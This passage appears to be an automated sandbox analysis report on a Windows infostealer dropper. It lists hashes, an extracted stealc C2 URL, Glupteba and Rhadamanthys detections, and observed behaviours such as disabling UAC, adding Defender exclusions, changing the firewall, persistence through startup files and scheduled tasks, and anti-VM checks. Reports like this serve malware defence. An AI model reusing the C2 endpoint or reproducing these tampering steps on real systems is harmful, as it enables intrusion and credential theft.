Analysis
-
max time kernel
113s -
max time network
174s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28-03-2024 12:58
Static task
static1
Behavioral task
behavioral1
Sample
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe
Resource
win10v2004-20240226-en
General
-
Target
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe
-
Size
395KB
-
MD5
47ca0c7940583630b294c30a8e1960b2
-
SHA1
50978f49401da7fbbc8b9b4706262e5bcb6afd51
-
SHA256
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae
-
SHA512
dcade30e9f8564a6291a68669b683d3be6bc71a62389004efb7424ab2231c9b92f17d2939c7e56eb6634b76305ed5e7b10f2f6de9341953c47adbd6bccfea8e9
-
SSDEEP
12288:Vmz6kx6tp09A/b07Un67M8RW9FjSUzkvO9Vj:VG6kxy6S/b0Ingg9954G9V
Malware Config
Extracted
stealc
http://185.172.128.209
-
url_path
/3cd2b41cbde8fc9c.php
Signatures
-
Glupteba payload 15 IoCs
Processes:
resource yara_rule behavioral1/memory/2696-81-0x0000000003020000-0x000000000390B000-memory.dmp family_glupteba behavioral1/memory/2696-86-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2772-98-0x0000000002FA0000-0x000000000388B000-memory.dmp family_glupteba behavioral1/memory/2772-100-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2696-196-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2772-204-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/1556-155-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/1556-241-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2696-281-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2772-310-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/1556-331-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2696-372-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2772-373-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/1556-375-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2696-378-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
qwm9RVjuf5jbu5aLONlULih1.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" qwm9RVjuf5jbu5aLONlULih1.exe -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
RegAsm.exedescription pid Process procid_target PID 4812 created 2424 4812 RegAsm.exe 43 -
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe -
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exeqwm9RVjuf5jbu5aLONlULih1.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe = "0" ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" qwm9RVjuf5jbu5aLONlULih1.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
qwm9RVjuf5jbu5aLONlULih1.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ qwm9RVjuf5jbu5aLONlULih1.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
netsh.exenetsh.exenetsh.exepid Process 5744 netsh.exe 5732 netsh.exe 6080 netsh.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
qwm9RVjuf5jbu5aLONlULih1.exeInstall.exeInstall.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion qwm9RVjuf5jbu5aLONlULih1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion qwm9RVjuf5jbu5aLONlULih1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exeregasm.exedGRFal8qQzpgtFutf7LbHsxR.exeInstall.exeInstall.exeu1ag.0.exeHDGDHCGCBK.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation regasm.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation dGRFal8qQzpgtFutf7LbHsxR.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation u1ag.0.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation HDGDHCGCBK.exe -
Drops startup file 10 IoCs
Processes:
regasm.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I1zODrmp3iqlrL70ymyHxHZ7.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WqzERsVQn7Fh6H7riw3XMctE.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CK1PRR7vT9hwKY8Cnvi9ejSQ.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ByEgmEpg5srbU2rlGXxRbXGK.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6mCOvw8IOvhsjYTRr5tzFkti.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dy3Y8CbcBbk8bLrqg34ruIUM.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1tUqGOHmvmtiu9fUnhmEeuZe.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H2Mos0hDS1RNNHOs9Fqvxf0h.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Upstr2kazNGla9Rp077HNRay.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\11x6QP3HUzuw3mwoRGyd4zeP.bat regasm.exe -
Executes dropped EXE 23 IoCs
Processes:
dGRFal8qQzpgtFutf7LbHsxR.exeHJcsbqzHq8hiX6npx01bsD0k.exegOQS8nuAiujAwUuADEy77FZC.exe9J0qa6e7aiaDLK5JDqoWIdOI.exeqwm9RVjuf5jbu5aLONlULih1.exe8CLOmIiMrlPxKA256rlqHgAu.exeu1ag.0.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeu1ag.1.exe9As7Ub276Pn8UYWeX7WAnwst.exe5TVfzHVntQFq0XimVhZ7m8WF.exeInstall.exeInstall.exeInstall.exeInstall.exeHDGDHCGCBK.exeAssistant_108.0.5067.20_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.exepid Process 1672 dGRFal8qQzpgtFutf7LbHsxR.exe 2696 HJcsbqzHq8hiX6npx01bsD0k.exe 2772 gOQS8nuAiujAwUuADEy77FZC.exe 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 3420 qwm9RVjuf5jbu5aLONlULih1.exe 1556 8CLOmIiMrlPxKA256rlqHgAu.exe 820 u1ag.0.exe 1308 LfewfClIhATqHqW1CxsJIhoA.exe 888 LfewfClIhATqHqW1CxsJIhoA.exe 4820 LfewfClIhATqHqW1CxsJIhoA.exe 2996 LfewfClIhATqHqW1CxsJIhoA.exe 3916 LfewfClIhATqHqW1CxsJIhoA.exe 4956 u1ag.1.exe 5368 9As7Ub276Pn8UYWeX7WAnwst.exe 5376 5TVfzHVntQFq0XimVhZ7m8WF.exe 5788 Install.exe 5864 Install.exe 5796 Install.exe 1400 Install.exe 5628 HDGDHCGCBK.exe 5780 Assistant_108.0.5067.20_Setup.exe_sfx.exe 4420 assistant_installer.exe 1440 assistant_installer.exe -
Loads dropped DLL 11 IoCs
Processes:
LfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeu1ag.0.exeassistant_installer.exeassistant_installer.exepid Process 1308 LfewfClIhATqHqW1CxsJIhoA.exe 888 LfewfClIhATqHqW1CxsJIhoA.exe 4820 LfewfClIhATqHqW1CxsJIhoA.exe 2996 LfewfClIhATqHqW1CxsJIhoA.exe 3916 LfewfClIhATqHqW1CxsJIhoA.exe 820 u1ag.0.exe 820 u1ag.0.exe 4420 assistant_installer.exe 4420 assistant_installer.exe 1440 assistant_installer.exe 1440 assistant_installer.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/files/0x000200000001e720-112.dat themida behavioral1/memory/3420-135-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-143-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-145-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-146-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-149-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-153-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-154-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-156-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-239-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida -
Processes:
resource yara_rule behavioral1/files/0x0009000000023226-225.dat upx behavioral1/memory/4956-279-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral1/memory/4956-340-0x0000000000400000-0x0000000000930000-memory.dmp upx -
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exeqwm9RVjuf5jbu5aLONlULih1.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe = "0" ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" qwm9RVjuf5jbu5aLONlULih1.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exeqwm9RVjuf5jbu5aLONlULih1.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA qwm9RVjuf5jbu5aLONlULih1.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
LfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exedescription ioc Process File opened (read-only) \??\D: LfewfClIhATqHqW1CxsJIhoA.exe File opened (read-only) \??\F: LfewfClIhATqHqW1CxsJIhoA.exe File opened (read-only) \??\D: LfewfClIhATqHqW1CxsJIhoA.exe File opened (read-only) \??\F: LfewfClIhATqHqW1CxsJIhoA.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 83 ipinfo.io 85 ipinfo.io 81 api.myip.com 82 api.myip.com -
Drops file in System32 directory 6 IoCs
Processes:
Install.exeqwm9RVjuf5jbu5aLONlULih1.exeInstall.exedescription ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\GroupPolicy qwm9RVjuf5jbu5aLONlULih1.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini qwm9RVjuf5jbu5aLONlULih1.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol qwm9RVjuf5jbu5aLONlULih1.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI qwm9RVjuf5jbu5aLONlULih1.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
qwm9RVjuf5jbu5aLONlULih1.exepid Process 3420 qwm9RVjuf5jbu5aLONlULih1.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe9J0qa6e7aiaDLK5JDqoWIdOI.exedescription pid Process procid_target PID 2256 set thread context of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 4988 set thread context of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc Process File created C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job schtasks.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid Process 4668 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 3852 4988 WerFault.exe 105 3080 1672 WerFault.exe 99 5728 4812 WerFault.exe 108 5144 4812 WerFault.exe 108 5952 820 WerFault.exe 112 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u1ag.0.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u1ag.0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u1ag.0.exe -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 5196 schtasks.exe 4372 schtasks.exe 5664 schtasks.exe 5724 schtasks.exe 4348 schtasks.exe 3876 schtasks.exe 6004 schtasks.exe 2112 schtasks.exe 5384 schtasks.exe 5880 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exeInstall.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Processes:
LfewfClIhATqHqW1CxsJIhoA.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 LfewfClIhATqHqW1CxsJIhoA.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e LfewfClIhATqHqW1CxsJIhoA.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e LfewfClIhATqHqW1CxsJIhoA.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 27 IoCs
Processes:
powershell.exeu1ag.0.exeRegAsm.exedialer.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpid Process 2844 powershell.exe 2844 powershell.exe 820 u1ag.0.exe 820 u1ag.0.exe 4812 RegAsm.exe 4812 RegAsm.exe 5568 dialer.exe 5568 dialer.exe 5568 dialer.exe 5568 dialer.exe 6032 powershell.exe 6032 powershell.exe 6040 powershell.exe 6040 powershell.exe 6048 powershell.exe 6048 powershell.exe 6032 powershell.exe 6048 powershell.exe 6040 powershell.exe 4200 powershell.EXE 4200 powershell.EXE 820 u1ag.0.exe 820 u1ag.0.exe 4200 powershell.EXE 4204 powershell.EXE 4204 powershell.EXE 4204 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exeregasm.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEdescription pid Process Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 3380 regasm.exe Token: SeDebugPrivilege 6032 powershell.exe Token: SeDebugPrivilege 6040 powershell.exe Token: SeDebugPrivilege 6048 powershell.exe Token: SeDebugPrivilege 4200 powershell.EXE Token: SeDebugPrivilege 4204 powershell.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
u1ag.1.exepid Process 4956 u1ag.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
